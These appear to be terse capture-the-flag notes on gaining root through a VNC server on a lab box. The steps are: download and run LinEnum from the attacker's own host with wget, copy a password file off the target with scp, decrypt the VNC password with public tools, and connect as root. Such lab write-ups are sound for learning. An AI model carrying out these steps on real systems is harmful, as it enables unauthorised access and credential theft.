# vnc

## Find vnc running as root

```
LinEnum.sh

wget $MyIP:8000/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh              ..script didnt work for bsd

ps -auxw                  ..look at processes
vnc ..tightvnc            ..found running as root!!

netstat -an | grep LIST   ..vnc listening on 5801,5901
```

## Password file

* Strange looking file.
* Copy locally to analyze.

```
secret.zip            ..found

scp chariz@$IP:secret.zip .
unzip secret.zip

file secret           ..non-iso ascii, unknown
cat secret            ..jibberish
xxd secret            ..nada
```

## Connect with password file

```
vncviewer -passwd secretfile 10.x.x.x::6901
```

## Password decrypt (bonus)

```
----------------
git clone https://github.com/jeroennijhof/vncpwd
cd vncpwd
make
./vncpwd
./vncpwd ../secret    ..password found!

----------------
github > trinitronx/vncpasswd.py
python vncpasswd.py -d -f ./htb/poison/secret
```